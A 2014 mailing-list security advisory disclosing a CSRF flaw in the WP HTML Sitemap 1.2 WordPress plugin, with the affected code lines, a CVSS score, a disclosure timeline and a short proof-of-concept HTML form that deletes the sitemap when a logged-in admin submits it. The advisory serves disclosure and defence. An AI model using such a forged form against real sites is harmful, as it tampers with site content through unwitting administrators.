[wp-hackers] CSRF vulnerability in WP HTML Sitemap 1.2 (WordPress plugin)

Harry Metcalfe harry at dxw.com
Fri Mar 28 12:39:23 UTC 2014

Details
================
Software: WP HTML Sitemap
Version: 1.2
Homepage: http://wordpress.org/plugins/wp-html-sitemap/
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)

Description
================
CSRF vulnerability in WP HTML Sitemap 1.2

Vulnerability
================
A CSRF vulnerability exists which allows an attacker to delete the
sitemap if a logged-in admin user visits a link of the attacker’s choosing.
Line 202 of inc/AdminPage.php says “// check whether form was just
submitted” but the following if/elseif statements only check whether a
particular button was pressed without checking nonce values. The form in
question is printed in wp_html_sitemap_AdminPage::createSitemapForm()
around line 146 of the same file.

Proof of concept
================
This form deletes the sitemap without requiring a nonce value:
<form
action="http://not-a-real-site.local/wp-admin/options-general.php?page=wp-html-sitemap&tab=general"
method="POST">
<input type="text" name="deleteSitemap" value="Delete Sitemap">
<input type="submit">
</form>

Mitigations
================
Disable the plugin until a fix is available.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security at dxw.com to acknowledge this report if you
received it via a third party (for example, plugins at wordpress.org) as
they generally cannot communicate with us on your behalf.

Please note that this vulnerability will be published if we do not
receive a response to this report with 14 days.

Timeline

2014-02-21: Discovered
2014-02-26: Reported
2014-03-28: No response received. Published

Discovered by dxw: